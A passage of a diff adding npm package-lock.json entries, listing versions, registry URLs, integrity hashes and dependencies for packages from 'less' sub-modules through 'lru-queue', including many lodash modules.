"^5.0.0" + } + }, + "node_modules/less/node_modules/mime": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/mime/-/mime-1.6.0.tgz", + "integrity": "sha512-x0Vn8spI+wuJ1O6S7gnbaQg8Pxh4NNHb7KSINmEWKiPE4RKOplvijn+NkmYmmRgP68mc70j2EbeTFRsrswaQeg==", + "dev": true, + "optional": true, + "bin": { + "mime": "cli.js" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/less/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "dev": true + }, + "node_modules/leven": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", + "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6" + } + }, + "node_modules/levn": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/levn/-/levn-0.4.1.tgz", + "integrity": "sha512-+bT2uH4E5LGE7h/n3evcS/sQlJXCpIp6ym8OWJ5eV6+67Dsql/LaaT7qJBAt2rzfoa/5QBGBhxDix1dMt2kQKQ==", + "dependencies": { + "prelude-ls": "^1.2.1", + "type-check": "~0.4.0" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/lilconfig": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/lilconfig/-/lilconfig-2.1.0.tgz", + "integrity": "sha512-utWOt/GHzuUxnLKxB6dk81RoOeoNeHgbrXiuGk4yyF5qlRz+iIVWu56E2fqGHFrXz0QNUhLB/8nKqvRH66JKGQ==", + "dev": true, + "engines": { + "node": ">=10" + } + }, + "node_modules/lines-and-columns": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", + "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", + "dev": true + }, + "node_modules/linkify-it": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/linkify-it/-/linkify-it-5.0.0.tgz", + "integrity": "sha512-5aHCbzQRADcdP+ATqnDuhhJ/MRIqDkZX5pyjFHRRysS8vZ5AbqGEoFIb6pYHPZ+L/OC2Lc+xT8uHVVR5CAK/wQ==", + "dependencies": { + "uc.micro": "^2.0.0" + } + }, + "node_modules/linkify-it/node_modules/uc.micro": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/uc.micro/-/uc.micro-2.1.0.tgz", + "integrity": "sha512-ARDJmphmdvUk6Glw7y9DQ2bFkKBHwQHLi2lsaH6PPmz/Ka9sFOBsBluozhDltWmnv9u/cF6Rt87znRTPV+yp/A==" + }, + "node_modules/listr2": { + "version": "3.14.0", + "resolved": "https://registry.npmjs.org/listr2/-/listr2-3.14.0.tgz", + "integrity": "sha512-TyWI8G99GX9GjE54cJ+RrNMcIFBfwMPxc3XTFiAYGN4s10hWROGtOg7+O6u6LE3mNkyld7RSLE6nrKBvTfcs3g==", + "dev": true, + "dependencies": { + "cli-truncate": "^2.1.0", + "colorette": "^2.0.16", + "log-update": "^4.0.0", + "p-map": "^4.0.0", + "rfdc": "^1.3.0", + "rxjs": "^7.5.1", + "through": "^2.3.8", + "wrap-ansi": "^7.0.0" + }, + "engines": { + "node": ">=10.0.0" + }, + "peerDependencies": { + "enquirer": ">= 2.3.0 < 3" + }, + "peerDependenciesMeta": { + "enquirer": { + "optional": true + } + } + }, + "node_modules/load-script": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/load-script/-/load-script-1.0.0.tgz", + "integrity": "sha1-BJGTngvuVkPuSUp+PaPSuscMbKQ=", + "dev": true + }, + "node_modules/loader-runner": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/loader-runner/-/loader-runner-4.2.0.tgz", + "integrity": "sha512-92+huvxMvYlMzMt0iIOukcwYBFpkYJdpl2xsZ7LrlayO7E8SOv+JJUEK17B/dJIHAOLMfh2dZZ/Y18WgmGtYNw==", + "dev": true, + "engines": { + "node": ">=6.11.5" + } + }, + "node_modules/loader-utils": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/loader-utils/-/loader-utils-2.0.4.tgz", + "integrity": "sha512-xXqpXoINfFhgua9xiqD8fPFHgkoq1mmmpE92WlDbm9rNRd/EbRb+Gqf908T2DMfuHjjJlksiK2RbHVOdD/MqSw==", + "dev": true, + "dependencies": { + "big.js": "^5.2.2", + "emojis-list": "^3.0.0", + "json5": "^2.1.2" + }, + "engines": { + "node": ">=8.9.0" + } + }, + "node_modules/loader-utils/node_modules/big.js": { + "version": "5.2.2", + "resolved": "https://registry.npmjs.org/big.js/-/big.js-5.2.2.tgz", + "integrity": "sha512-vyL2OymJxmarO8gxMr0mhChsO9QGwhynfuu4+MHTAW6czfq9humCB7rKpUjDd9YUiDPU4mzpyupFSvOClAwbmQ==", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/locate-path": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-6.0.0.tgz", + "integrity": "sha512-iPZK6eYjbxRu3uB4/WZ3EsEIMJFMqAoopl3R+zuq0UjcAm/MO6KCweDgPfP3elTztoKP3KtnVHxTn2NHBSDVUw==", + "dependencies": { + "p-locate": "^5.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/lockfile": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/lockfile/-/lockfile-1.0.4.tgz", + "integrity": "sha512-cvbTwETRfsFh4nHsL1eGWapU1XFi5Ot9E85sWAwia7Y7EgB7vfqcZhTKZ+l7hCGxSPoushMv5GKhT5PdLv03WA==", + "dev": true, + "dependencies": { + "signal-exit": "^3.0.2" + } + }, + "node_modules/lodash": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", + "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" + }, + "node_modules/lodash-es": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==", + "dev": true + }, + "node_modules/lodash._arraypool": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._arraypool/-/lodash._arraypool-2.4.1.tgz", + "integrity": "sha1-6I7suS4ruEyQZWEv2VigcZzUf5Q=" + }, + "node_modules/lodash._basebind": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._basebind/-/lodash._basebind-2.4.1.tgz", + "integrity": "sha1-6UC5690nwyfgqNqxtVkWxTQelXU=", + "dependencies": { + "lodash._basecreate": "~2.4.1", + "lodash._setbinddata": "~2.4.1", + "lodash._slice": "~2.4.1", + "lodash.isobject": "~2.4.1" + } + }, + "node_modules/lodash._baseclone": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._baseclone/-/lodash._baseclone-2.4.1.tgz", + "integrity": "sha1-MPgj5X4X43NdODvWK2Czh1Q7QYY=", + "dependencies": { + "lodash._getarray": "~2.4.1", + "lodash._releasearray": "~2.4.1", + "lodash._slice": "~2.4.1", + "lodash.assign": "~2.4.1", + "lodash.foreach": "~2.4.1", + "lodash.forown": "~2.4.1", + "lodash.isarray": "~2.4.1", + "lodash.isobject": "~2.4.1" + } + }, + "node_modules/lodash._basecreate": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._basecreate/-/lodash._basecreate-2.4.1.tgz", + "integrity": "sha1-+Ob1tXip405UEXm1a47uv0oofgg=", + "dependencies": { + "lodash._isnative": "~2.4.1", + "lodash.isobject": "~2.4.1", + "lodash.noop": "~2.4.1" + } + }, + "node_modules/lodash._basecreatecallback": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._basecreatecallback/-/lodash._basecreatecallback-2.4.1.tgz", + "integrity": "sha1-fQsmdknLKeehOdAQO3wR+uhOSFE=", + "dependencies": { + "lodash._setbinddata": "~2.4.1", + "lodash.bind": "~2.4.1", + "lodash.identity": "~2.4.1", + "lodash.support": "~2.4.1" + } + }, + "node_modules/lodash._basecreatewrapper": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._basecreatewrapper/-/lodash._basecreatewrapper-2.4.1.tgz", + "integrity": "sha1-TTHy595+E0+/KAN2K4FQsyUZZm8=", + "dependencies": { + "lodash._basecreate": "~2.4.1", + "lodash._setbinddata": "~2.4.1", + "lodash._slice": "~2.4.1", + "lodash.isobject": "~2.4.1" + } + }, + "node_modules/lodash._createwrapper": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._createwrapper/-/lodash._createwrapper-2.4.1.tgz", + "integrity": "sha1-UdaVeXPaTtVW43KQ2MGhjFPeFgc=", + "dependencies": { + "lodash._basebind": "~2.4.1", + "lodash._basecreatewrapper": "~2.4.1", + "lodash._slice": "~2.4.1", + "lodash.isfunction": "~2.4.1" + } + }, + "node_modules/lodash._getarray": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._getarray/-/lodash._getarray-2.4.1.tgz", + "integrity": "sha1-+vH3+BD6mFolHCGHQESBCUg55e4=", + "dependencies": { + "lodash._arraypool": "~2.4.1" + } + }, + "node_modules/lodash._isnative": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._isnative/-/lodash._isnative-2.4.1.tgz", + "integrity": "sha1-PqZAS3hKe+g2x7V1gOHN95sUgyw=" + }, + "node_modules/lodash._maxpoolsize": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._maxpoolsize/-/lodash._maxpoolsize-2.4.1.tgz", + "integrity": "sha1-nUgvRjuOZq++WcLBTtsRcGAXIzQ=" + }, + "node_modules/lodash._objecttypes": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._objecttypes/-/lodash._objecttypes-2.4.1.tgz", + "integrity": "sha1-fAt/admKH3ZSn4kLDNsbTf7BHBE=" + }, + "node_modules/lodash._releasearray": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._releasearray/-/lodash._releasearray-2.4.1.tgz", + "integrity": "sha1-phOWMNdtFTawfdyAliiJsIL2pkE=", + "dependencies": { + "lodash._arraypool": "~2.4.1", + "lodash._maxpoolsize": "~2.4.1" + } + }, + "node_modules/lodash._setbinddata": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._setbinddata/-/lodash._setbinddata-2.4.1.tgz", + "integrity": "sha1-98IAzRuS7yNrOZ7s9zxkjReqlNI=", + "dependencies": { + "lodash._isnative": "~2.4.1", + "lodash.noop": "~2.4.1" + } + }, + "node_modules/lodash._shimkeys": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._shimkeys/-/lodash._shimkeys-2.4.1.tgz", + "integrity": "sha1-bpzJZm/wgfC1psl4uD4kLmlJ0gM=", + "dependencies": { + "lodash._objecttypes": "~2.4.1" + } + }, + "node_modules/lodash._slice": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash._slice/-/lodash._slice-2.4.1.tgz", + "integrity": "sha1-dFz0GlNZexj2iImFREBe+isG2Q8=" + }, + "node_modules/lodash.assign": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.assign/-/lodash.assign-2.4.1.tgz", + "integrity": "sha1-hMOVlt1xGBqXsGUpE6fJZ15Jsao=", + "dependencies": { + "lodash._basecreatecallback": "~2.4.1", + "lodash._objecttypes": "~2.4.1", + "lodash.keys": "~2.4.1" + } + }, + "node_modules/lodash.bind": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.bind/-/lodash.bind-2.4.1.tgz", + "integrity": "sha1-XRn6AFyMTSNvr0dCx7eh/Kvikmc=", + "dependencies": { + "lodash._createwrapper": "~2.4.1", + "lodash._slice": "~2.4.1" + } + }, + "node_modules/lodash.camelcase": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz", + "integrity": "sha1-soqmKIorn8ZRA1x3EfZathkDMaY=" + }, + "node_modules/lodash.clonedeep": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.clonedeep/-/lodash.clonedeep-2.4.1.tgz", + "integrity": "sha1-8pIDtAsS/uCkXTYxZIJZvrq8eGg=", + "dependencies": { + "lodash._baseclone": "~2.4.1", + "lodash._basecreatecallback": "~2.4.1" + } + }, + "node_modules/lodash.debounce": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/lodash.debounce/-/lodash.debounce-4.0.8.tgz", + "integrity": "sha512-FT1yDzDYEoYWhnSGnpE/4Kj1fLZkDFyqRb7fNt6FdYOSxlUWAtp42Eh6Wb0rGIv/m9Bgo7x4GhQbm5Ys4SG5ow==", + "dev": true + }, + "node_modules/lodash.defaults": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/lodash.defaults/-/lodash.defaults-4.2.0.tgz", + "integrity": "sha1-0JF4cW/+pN3p5ft7N/bwgCJ0WAw=" + }, + "node_modules/lodash.difference": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/lodash.difference/-/lodash.difference-4.5.0.tgz", + "integrity": "sha1-nMtOUF1Ia5FlE0V3KIWi3yf9AXw=" + }, + "node_modules/lodash.flatten": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/lodash.flatten/-/lodash.flatten-4.4.0.tgz", + "integrity": "sha1-8xwiIlqWMtK7+OSt2+8kCqdlph8=" + }, + "node_modules/lodash.foreach": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.foreach/-/lodash.foreach-2.4.1.tgz", + "integrity": "sha1-/j/Do0yGyUyrb5UiVgKCdB4BYwk=", + "dependencies": { + "lodash._basecreatecallback": "~2.4.1", + "lodash.forown": "~2.4.1" + } + }, + "node_modules/lodash.forown": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.forown/-/lodash.forown-2.4.1.tgz", + "integrity": "sha1-eLQer+FAX6lmRZ6kGT/VAtCEUks=", + "dependencies": { + "lodash._basecreatecallback": "~2.4.1", + "lodash._objecttypes": "~2.4.1", + "lodash.keys": "~2.4.1" + } + }, + "node_modules/lodash.get": { + "version": "4.4.2", + "resolved": "https://registry.npmjs.org/lodash.get/-/lodash.get-4.4.2.tgz", + "integrity": "sha1-LRd/ZS+jHpObRDjVNBSZ36OCXpk=" + }, + "node_modules/lodash.has": { + "version": "4.5.2", + "resolved": "https://registry.npmjs.org/lodash.has/-/lodash.has-4.5.2.tgz", + "integrity": "sha1-0Z9NwQlQWMzL4rDN9O4P5Ko3yGI=", + "dev": true + }, + "node_modules/lodash.identity": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.identity/-/lodash.identity-2.4.1.tgz", + "integrity": "sha1-ZpTP+mX++TH3wxzobHRZfPVg9PE=" + }, + "node_modules/lodash.includes": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/lodash.includes/-/lodash.includes-4.3.0.tgz", + "integrity": "sha512-W3Bx6mdkRTGtlJISOvVD/lbqjTlPPUDTMnlXZFnVwi9NKJ6tiAk6LVdlhZMm17VZisqhKcgzpO5Wz91PCt5b0w==" + }, + "node_modules/lodash.isarguments": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/lodash.isarguments/-/lodash.isarguments-3.1.0.tgz", + "integrity": "sha1-L1c9hcaiQon/AGY7SRwdM4/zRYo=" + }, + "node_modules/lodash.isarray": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.isarray/-/lodash.isarray-2.4.1.tgz", + "integrity": "sha1-tSoybB9i9tfac6MdVAHfbvRPD6E=", + "dependencies": { + "lodash._isnative": "~2.4.1" + } + }, + "node_modules/lodash.isboolean": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/lodash.isboolean/-/lodash.isboolean-3.0.3.tgz", + "integrity": "sha512-Bz5mupy2SVbPHURB98VAcw+aHh4vRV5IPNhILUCsOzRmsTmSQ17jIuqopAentWoehktxGd9e/hbIXq980/1QJg==" + }, + "node_modules/lodash.isequal": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/lodash.isequal/-/lodash.isequal-4.5.0.tgz", + "integrity": "sha1-QVxEePK8wwEgwizhDtMib30+GOA=" + }, + "node_modules/lodash.isfunction": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.isfunction/-/lodash.isfunction-2.4.1.tgz", + "integrity": "sha1-LP1XXHPkmKtX4xm3f6Aq3vE6lNE=" + }, + "node_modules/lodash.isinteger": { + "version": "4.0.4", + "resolved": "https://registry.npmjs.org/lodash.isinteger/-/lodash.isinteger-4.0.4.tgz", + "integrity": "sha512-DBwtEWN2caHQ9/imiNeEA5ys1JoRtRfY3d7V9wkqtbycnAmTvRRmbHKDV4a0EYc678/dia0jrte4tjYwVBaZUA==" + }, + "node_modules/lodash.isnumber": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/lodash.isnumber/-/lodash.isnumber-3.0.3.tgz", + "integrity": "sha512-QYqzpfwO3/CWf3XP+Z+tkQsfaLL/EnUlXWVkIk5FUPc4sBdTehEqZONuyRt2P67PXAk+NXmTBcc97zw9t1FQrw==" + }, + "node_modules/lodash.isobject": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.isobject/-/lodash.isobject-2.4.1.tgz", + "integrity": "sha1-Wi5H/mmVPx7mMafrof5k0tBlWPU=", + "dependencies": { + "lodash._objecttypes": "~2.4.1" + } + }, + "node_modules/lodash.isplainobject": { + "version": "4.0.6", + "resolved": "https://registry.npmjs.org/lodash.isplainobject/-/lodash.isplainobject-4.0.6.tgz", + "integrity": "sha1-fFJqUtibRcRcxpC4gWO+BJf1UMs=" + }, + "node_modules/lodash.isstring": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/lodash.isstring/-/lodash.isstring-4.0.1.tgz", + "integrity": "sha1-1SfftUVuynzJu5XV2ur4i6VKVFE=" + }, + "node_modules/lodash.keys": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.keys/-/lodash.keys-2.4.1.tgz", + "integrity": "sha1-SN6kbfj/djKxDXBrissmWR4rNyc=", + "dependencies": { + "lodash._isnative": "~2.4.1", + "lodash._shimkeys": "~2.4.1", + "lodash.isobject": "~2.4.1" + } + }, + "node_modules/lodash.memoize": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", + "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", + "dev": true + }, + "node_modules/lodash.merge": { + "version": "4.6.2", + "resolved": "https://registry.npmjs.org/lodash.merge/-/lodash.merge-4.6.2.tgz", + "integrity": "sha512-0KpjqXRVvrYyCsX1swR/XTK0va6VQkQM6MNo7PqW77ByjAhoARA8EfrP1N4+KlKj8YS0ZUCtRT/YUuhyYDujIQ==" + }, + "node_modules/lodash.noop": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.noop/-/lodash.noop-2.4.1.tgz", + "integrity": "sha1-T7VPgWZS5a4Q6PcvcXo4jHMmU4o=" + }, + "node_modules/lodash.once": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/lodash.once/-/lodash.once-4.1.1.tgz", + "integrity": "sha1-DdOXEhPHxW34gJd9UEyI+0cal6w=" + }, + "node_modules/lodash.support": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/lodash.support/-/lodash.support-2.4.1.tgz", + "integrity": "sha1-Mg4LZwMWc8KNeiu12eAzGkUkBRU=", + "dependencies": { + "lodash._isnative": "~2.4.1" + } + }, + "node_modules/lodash.truncate": { + "version": "4.4.2", + "resolved": "https://registry.npmjs.org/lodash.truncate/-/lodash.truncate-4.4.2.tgz", + "integrity": "sha512-jttmRe7bRse52OsWIMDLaXxWqRAmtIUccAQ3garviCqJjafXOfNMO0yMfNpdD6zbGaTU0P5Nz7e7gAT6cKmJRw==", + "dev": true + }, + "node_modules/lodash.union": { + "version": "4.6.0", + "resolved": "https://registry.npmjs.org/lodash.union/-/lodash.union-4.6.0.tgz", + "integrity": "sha1-SLtQiECfFvGCFmZkHETdGqrjzYg=" + }, + "node_modules/lodash.uniq": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/lodash.uniq/-/lodash.uniq-4.5.0.tgz", + "integrity": "sha512-xfBaXQd9ryd9dlSDvnvI0lvxfLJlYAZzXomUYzLKtUeOQvOP5piqAWuGtrhWeqaXK9hhoM/iyJc5AV+XfsX3HQ==", + "dev": true + }, + "node_modules/log": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/log/-/log-6.3.1.tgz", + "integrity": "sha512-McG47rJEWOkXTDioZzQNydAVvZNeEkSyLJ1VWkFwfW+o1knW+QSi8D1KjPn/TnctV+q99lkvJNe1f0E1IjfY2A==", + "dependencies": { + "d": "^1.0.1", + "duration": "^0.2.2", + "es5-ext": "^0.10.53", + "event-emitter": "^0.3.5", + "sprintf-kit": "^2.0.1", + "type": "^2.5.0", + "uni-global": "^1.0.0" + } + }, + "node_modules/log-symbols": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/log-symbols/-/log-symbols-4.1.0.tgz", + "integrity": "sha512-8XPvpAA8uyhfteu8pIvQxpJZ7SYYdpUivZpGy6sFsBuKRY/7rQGavedeB8aK+Zkyq6upMFVL/9AW6vOYzfRyLg==", + "dev": true, + "dependencies": { + "chalk": "^4.1.0", + "is-unicode-supported": "^0.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/log-symbols/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/log-symbols/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/log-symbols/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/log-update": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/log-update/-/log-update-4.0.0.tgz", + "integrity": "sha512-9fkkDevMefjg0mmzWFBW8YkFP91OrizzkW3diF7CpG+S2EYdy4+TVfGwz1zeF8x7hCx1ovSPTOE9Ngib74qqUg==", + "dev": true, + "dependencies": { + "ansi-escapes": "^4.3.0", + "cli-cursor": "^3.1.0", + "slice-ansi": "^4.0.0", + "wrap-ansi": "^6.2.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/log-update/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/log-update/node_modules/wrap-ansi": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-6.2.0.tgz", + "integrity": "sha512-r6lPcBGxZXlIcymEu7InxDMhdW0KDxpLgoFLcguasxCaJ/SOIZwINatK9KY/tf+ZrlywOKU0UDj3ATXUBfxJXA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.0.0", + "string-width": "^4.1.0", + "strip-ansi": "^6.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/loglevel": { + "version": "1.9.1", + "resolved": "https://registry.npmjs.org/loglevel/-/loglevel-1.9.1.tgz", + "integrity": "sha512-hP3I3kCrDIMuRwAwHltphhDM1r8i55H33GgqjXbrisuJhF4kRhW1dNuxsRklp4bXl8DSdLaNLuiL4A/LWRfxvg==", + "dev": true, + "engines": { + "node": ">= 0.6.0" + }, + "funding": { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/loglevel" + } + }, + "node_modules/long": { + "version": "5.2.3", + "resolved": "https://registry.npmjs.org/long/-/long-5.2.3.tgz", + "integrity": "sha512-lcHwpNoggQTObv5apGNCTdJrO69eHOZMi4BNC+rTLER8iHAqGrUVeLh/irVIM7zTw2bOXA8T6uNPeujwOLg/2Q==" + }, + "node_modules/loose-envify": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/loose-envify/-/loose-envify-1.4.0.tgz", + "integrity": "sha512-lyuxPGr/Wfhrlem2CL/UcnUc1zcqKAImBDzukY7Y5F/yQiNdko6+fRLevlw1HgMySw7f611UIY408EtxRSoK3Q==", + "dependencies": { + "js-tokens": "^3.0.0 || ^4.0.0" + }, + "bin": { + "loose-envify": "cli.js" + } + }, + "node_modules/loupe": { + "version": "2.3.7", + "resolved": "https://registry.npmjs.org/loupe/-/loupe-2.3.7.tgz", + "integrity": "sha512-zSMINGVYkdpYSOBmLi0D1Uo7JU9nVdQKrHxC8eYlV+9YKK9WePqAlL7lSlorG/U2Fw1w0hTBmaa/jrQ3UbPHtA==", + "dev": true, + "dependencies": { + "get-func-name": "^2.0.1" + } + }, + "node_modules/lower-case": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/lower-case/-/lower-case-2.0.2.tgz", + "integrity": "sha512-7fm3l3NAF9WfN6W3JOmf5drwpVqX78JtoGJ3A6W0a6ZnldM41w2fV5D490psKFTpMds8TJse/eHLFFsNHHjHgg==", + "dev": true, + "dependencies": { + "tslib": "^2.0.3" + } + }, + "node_modules/lru-cache": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", + "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", + "dependencies": { + "yallist": "^3.0.2" + } + }, + "node_modules/lru-cache-for-clusters-as-promised": { + "version": "1.7.4", + "resolved": "https://registry.npmjs.org/lru-cache-for-clusters-as-promised/-/lru-cache-for-clusters-as-promised-1.7.4.tgz", + "integrity": "sha512-7A+O3nSLQZua1Et9MTuKP7Tl7Zo2L5OucBafTsmAXHQ7M9whxforWoM2RsX25sP3HmaVwF7D7Eg64o6iqAuZkw==", + "dependencies": { + "cron": "1.8.2", + "debug": "4.3.3", + "lru-cache": "6.0.0", + "uuid": "8.3.2" + } + }, + "node_modules/lru-cache-for-clusters-as-promised/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/lru-cache-for-clusters-as-promised/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/lru-cache-for-clusters-as-promised/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/lru-queue": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/lru-queue/-/lru-queue-0.1.0.tgz", + 